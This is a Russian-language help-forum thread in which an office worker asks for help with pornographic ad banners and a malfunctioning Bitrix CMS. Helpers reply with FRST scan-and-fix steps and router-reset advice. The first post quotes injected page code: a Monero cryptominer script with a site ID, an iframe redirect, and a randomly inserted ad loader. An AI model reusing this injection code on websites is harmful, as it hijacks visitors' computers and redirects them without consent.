Перейти к содержанию

Высплывающее окно Bonga Cams в браузере + консоль рабочего сайта работает со сбоями


Жанна Байкова

Рекомендуемые сообщения

Добрый день!
 
У меня возникла проблема на рабочем компьютере: на некоторых страницах в Chrome появляется баннер порно-портала BongaCams. Примечательно, что такой баннер появляется в браузерах и у моих коллег.
 
Из-за браузерного вируса с перебоями работает CMS 1С Битрикс, через которую я размещаю материалы на корпоративном сайте. Сайт иногда работает некорректно: при нажатии на кнопку или ссылку может перебросить в другой раздел. Если нажать Ctrl+U, иногда появляется следующий код:
 

 

<html>
<head>
  <script src="https://xmr.omine.org/assets/v7.js"></script>
  <script>
    OMINEId("f6c7f38e473a4a0a9d9d1f340cb260a3","-1");
    throttleMiner=30;
  </script> 
</head>
<body>
  <div >
     <iframe src="http://www.r-id.ru/"width="100%" height="100%" id="demo_frame" scrolling="no" frameborder="0"></iframe>
  </div>
<script>
  var i = document.getElementById('demo_frame');
  var t; 
 
  function d() {
    if (navigator.appName=="Opera") {
      i.src = "http://www.r-id.ru//"
    }
    clearInterval(t);
    t = setInterval("m()",1000);
  }    
   
  function m() {
                var c = i.contentWindow || i.contentDocument;
                var newheight = c.document.body.scrollHeight;
                if (i.height != newheight) {i.height = newheight};
  }
  
  onload = d;
  onerror = function() {window.location.href = "http://www.r-id.ru/";}; 
  i.onerror = function() {window.location.href = "http://www.r-id.ru/";}
 
  if(Math.random()<0.1) {document.write("<script id='IM_JS' type='text\/javascript' src='https:\/\/promo-bc.com\/promo.php?c=616369&type=im&size=160x320&name=opc'><\/script>");}
 
</script>
 
</body>
</html>

 


 
Если перейти по ссылке [ссылка] из кода страницы, то попадаешь на сайт майнеров.
 
Консоль работает со сбоями: я не всегда могу загрузить картинку, некоторые функции не работают, иногда процесс работы не сохраняется при нажатии, приходится делать все заново. Поэтому прежде чем сохранять материал, приходится копировать код.
 
Обратилась за помощью к разработчикам сайта. Они проверили код сайта, работу консоли и со своей стороны ничего не нашли.
 
Открывала сайт на домашнем компьютере, консоль работала исправно.
 
Тогда на рабочем компьютере я запустила проверку с помощью Kaspersky Endpoint Security для Windows 11.0.0.6499. Антивирус не выявил ничего. 
 
После этого я установила Malwarebytes AdwCleaner. После чистки консоль начала время от времени работать (с переменным успехом), однако баннер BongaCams все еще всплывает в Chrome. Я опробовала работать в CMS Битрикс в других баузерах - там консоль так же работает с переменным успехом (то нормально, то сбоит).
 
Я позвала на помощь нашего сотрудника технического отдела, который по совместительству еще иногда исполняет обязанности сисадмина. Он удалил некоторые программы, которые я не использую, но проблему это решить не помогло.
 
После этого я установила Чистилку: https://chistilka.com/
 
Утилита пометила файл ecf00c38dc807e105d881c433a6b455dd2c606b6, который находится в C:\ProgramData, как подозрительный. Увы, для продолжения работы программа требует платной подписки, поэтому дальше я ничего с этим файлом сделать не могу. Решила погуглить, что это за файл, но так и не поняла, является ли он действительно вредоносным или нет, удалять его пока не стала.
 
Логи, первую и последнюю проверку AdwCleaner прикрепляю к теме.
 
Надеюсь, что Ваши специалисты помогут мне наконец решить проблему.
 
Заранее большое спасибо!

CollectionLog-2019.02.12-12.04.zip

AdwCleanerS05.txt

AdwCleanerS00.txt

Изменено пользователем Sandor
Убрал ссылку
Ссылка на сообщение
Поделиться на другие сайты

Здравствуйте!

 

для продолжения работы программа требует платной подписки

Вот и удалите её.

 

Также очистите следы от прежней установки Avast - Чистка системы после некорректного удаления антивируса.

 

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

 

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.

Когда программа запустится, нажмите Yes для соглашения с предупреждением.

 

Нажмите кнопку Scan.

После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.

Подробнее читайте в этом руководстве.

Ссылка на сообщение
Поделиться на другие сайты

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:

    Start::
    CreateRestorePoint:
    GroupPolicy: Restriction ? <==== ATTENTION
    GroupPolicy\User: Restriction ? <==== ATTENTION
    ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
    Task: {8694C82A-F8B2-47A1-9F17-3615116D7674} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe (AVAST Software s.r.o. -> AVAST Software)
    AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxlctlfudivq`qsp`28hfm [0]
    AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxlctlfudivq`qsp`29hfm [0]
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

 

Подробнее читайте в этом руководстве.

 

 

Примечательно, что такой баннер появляется в браузерах и у моих коллег

Вы с коллегами к сети подключены через роутер?
Ссылка на сообщение
Поделиться на другие сайты
Вы с коллегами к сети подключены через роутер?

 

 

Как объяснил мне наш сисадмин, мы все подключены к двум коммутаторам (кроме беспроводных клиентов), а оба коммутатора подключены к роутеру (который также является четырёхпортовым коммутатором, который не используется, и точкой доступа, к которой подключена часть беспроводных клиентов).

 

Благодарю Вас за инструкции, надеюсь, все получится.

 

Текст без проблем копируется с помощью Ctrl+C ;) Я не настолько ламер..)

Прикрепляю фикс-лог.

Fixlog.txt

Изменено пользователем Bigudi69
Ссылка на сообщение
Поделиться на другие сайты

Увы, проблема осталась: баннеры все еще появляются и CMS-ка по-прежнему работает с перебоями... В общем, пока не сработало.

post-52984-0-97411300-1550153702_thumb.jpg

Изменено пользователем Bigudi69
Ссылка на сообщение
Поделиться на другие сайты

Тот, кто имеет доступ к роутеру, пусть проверит его настройки или проделает следующее:

Сделайте аппаратный сброс настроек роутера на заводские, введите правильные настройки, смените пароль на вход в настройки роутера на сложный.

 

После этого вам нужно очистить кеш и куки всех браузеров.

Изменено пользователем Sandor
Ссылка на сообщение
Поделиться на другие сайты

пусть проверит его настройки

Скорее всего некоторые из них (конкретно DNS) указаны неверно. Это ведь ему не должно быть сложно сделать.
Ссылка на сообщение
Поделиться на другие сайты

Сисадмин сообщает, что ошибок быть здесь не может. В нашем случае DNS-сервер поставляется провайдером, прописан на DHCP-сервере и раздается всем DHCP-клиентам. Статические маршруты в системном реестре проверены.

Ссылка на сообщение
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • Rey_fw
      От Rey_fw
      Добрый день!
      Каким то образом словил вирус/возможно майнер который не могу найти и 100% определить. Не дает запустить установочные файлы антивируса, ранее блокировал сайты антивирусов (решилось исправлением файла хостс). на диске С появились папки антивирусов (скрытые, без возможности зайти и удалить их)
      Попытался сканировать разными антивирусами Dr.Web CureIt! зависает вместе с пк и не сканирует дальше (пк стоял сутки на проверке)
      Аваст пишет что все отлично, вирусов нет. Встроенный антивирус виндовса тоже не выявляет проблему
       
      На форуме нашел крайне похожую ситуацию
      Можно ли помочь решить данный вопрос? Заранее очень и очень благодарен!
      Addition.zip
    • Magda
      От Magda
      Доброго времени 
       
      Собираюсь скачать крякнутую Корону  9 для 3ds Max  . Что возможно было проверить , то проверено через ВирусТотал
      Загружен файл был через песочницу   ,  связи с чем  не знаю прикрепится ли он здесь (размер  638,6 мб) 
      ВирусТотал выдал одно предупреждение . Что это значит ? Вирус ,майнинг ? Или не стоит обращать внимания и вреда не причинит?
      Вот оно (и в теме его название тоже):
       

       
       
    • Bond911
      От Bond911
      Вообще как не стыдно мне было бы,но скачав программу Скинченжера для дота 2 заметил ,что после неё компьютер стал странно работать ,когда я играю компьютер начинает усиленно работать и процессор нагружается до100% ,но как только вкл Диспетчер задач,всё опускается до 40%, и игры начали как то подвисать, а игра дота 2 и во вовсе "типично" вылетает.Я переустанавливал винду 2 раза искал с помощью многих сканов,все равно,либо у меня уже бзиг и просто старый процессор,либо очень скрытный майнер.Извините если не расставляю запятые )
    • Ummitium
      От Ummitium
      Приветствую Евгений Валентинович!
      В разных новостных источниках пишут про идею NortonLifeLock Inc. (ранее бывшая Symantec Corporation) внедрить функцию майнинга в свои антивирусные продукты.
      Вот, что пишут:
       
      "Согласно официальному объявлению, антивирусная программа Norton 360 объявила о том, что вскоре запустит функцию майнинга Ethereum «Norton Crypto». Начиная с 3 июня компания будет приглашать первых пользователей для тестирования новых функций.
      Norton утверждает, что его новые функции могут безопасно майнить Ethereum, не подвергая компьютер огромным рискам, связанным с кодом без цензуры. Весь добытый Ethereum будет помещен в облачный кошелек Norton Wallet."
       
      Как оцениваете подобного рода функционал в антивирусных решениях?
    • kostyan2008
      От kostyan2008
      Добрый день! После установки торрента и скачивания через него, в яндекс браузере всплывают окна с сайтами порнографии, таких как бонгакамс
      CollectionLog-2020.12.04-20.00.zip
×
×
  • Создать...